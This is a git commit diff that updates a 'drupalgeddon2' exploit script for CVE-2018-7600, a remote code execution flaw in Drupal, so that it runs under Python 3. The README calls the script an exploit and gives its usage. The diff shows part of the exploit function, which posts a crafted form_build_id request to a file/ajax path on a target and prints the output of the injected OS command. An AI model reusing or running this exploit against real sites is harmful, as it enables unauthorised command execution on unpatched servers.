Updating to run fine with Python3

master
John Hammond 2023-12-31 20:13:47 -05:00
parent 6f43311008
commit d7371964ee
2 changed files with 16 additions and 5 deletions

View File

@ -1,4 +1,16 @@
# drupalgeddon2
This is a duplicate of https://github.com/lorddemon/drupalgeddon2/
Just tweaked very slightly to work fine with `python3`.
That's it.
-----------------------------------------
Exploit for CVE-2018-7600.
Usage: drupalgeddon2 options

View File

@ -1,8 +1,6 @@
#!/usr/bin/python
#!/usr/bin/python3
# coding: utf-8
import requests
import re
import sys
@ -22,9 +20,10 @@ def exploit(url_target,os_command):
parametros = {'q':'file/ajax/name/#value/' + found}
datos = {'form_build_id':found}
r = requests.post(url_target, data=datos, params=parametros)
r.encoding = 'ISO-8859-1'
salida = r.content.split("[{")
print salida[0]
salida = r.content.split(b"[{")
print(salida[0].decode('ISO-8859-1'))
def usage():
comm = os.path.basename(sys.argv[0])